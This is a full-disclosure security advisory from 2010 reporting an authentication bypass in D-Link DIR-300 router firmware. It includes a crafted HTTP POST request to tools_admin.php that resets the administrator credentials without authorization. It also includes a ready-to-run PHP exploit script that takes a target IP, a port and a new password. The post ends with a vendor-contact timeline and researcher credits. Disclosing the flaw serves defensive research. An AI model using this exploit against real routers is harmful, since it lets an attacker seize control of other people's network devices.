[intro] Hello, I found security bug in D-Link DIR-300 wireless router. It can be used to bypass authentication mechanizm by attacker with access to web interface. I reported it to D-Link but they are not replying for my emails. According to other D-Link security holes and their status I think that they won't reply, so I decided to write about it here. [Technical details] Control panel script - tools_admin.php allows attacker to change administrator name, password and other variables without any authorization by sending specially crafted http post request such as: ---cut here--- POST http://192.168.1.1:80/tools_admin.php HTTP/1.1 Host: 192.168.1.2 Keep-Alive: 115 Content-Type: application/x-www-form-urlencoded Content-length: 0 ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&login=+Log+In+&NO_NEED_AUTH=1&AUTH_GROUP=0&admin_name=admin&admin_password1=uhOHahEh ---cut here--- If attacker makes this request to the control panel, the administrator username is set to admin with password ,,uhOHahEh". [Affected] - All known D-Link DIR-300 firmware (ie. 2.01B1, 1.04, 1.05). - There is possibility that other dlink devices which use the same php scripts in control panel are affected. I'm not able to check it because I don't have devices for tests. I'm counting on you ;-> [Code] ---cut here--- <?php if(sizeof($argv)!=4) { echo "Usage: php5 $argv[0] <router ip addres> <port> <admin password>\n"; exit; } $ch=curl_init(); curl_setopt($ch, CURLOPT_URL, "http://".$argv[1]."/tools_admin.php";); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_PORT, $argv[2]); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, "ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&login=+Log+In+&NO_NEED_AUTH=1&AUTH_GROUP=0&admin_name=admin&admin_password1=".urlencode($argv[3])); echo "+ starting request\n"; $out = curl_exec($ch); if($out===false) { echo "- Error: could not connect ( http://$argv[1]:$argv[2]/tools_admin.php).\n"; exit; } else echo "+ request sended\n"; curl_close($ch); if(stripos($out,"Successfully")===false) { echo "- something goes wrong (check answer - answer.html) !\n"; $f=fopen("answer.html","w"); fwrite($f,$out); fclose($f); exit; } else echo "+ ok, now you can login using l: admin p:$argv[3]\n"; ?> ---cut here--- [History] - Information sent to vendor 07.08.2010 - No response - Information resended to vendor 07.31.2010 - No response from vendor [Credits] Karol CeliÅski ( Celin ) Pentester/Researcher @ Safe Computing [Contact] karol at celin dot pl [Greetz] Tomasz Sawiak, Jacek Kowalski, Marcin Kozlowski, Robert Tomczykowski, Wojtek Machaj, Marek Zmyslowski, Szymon Sobczyk and all Safe Computing members.
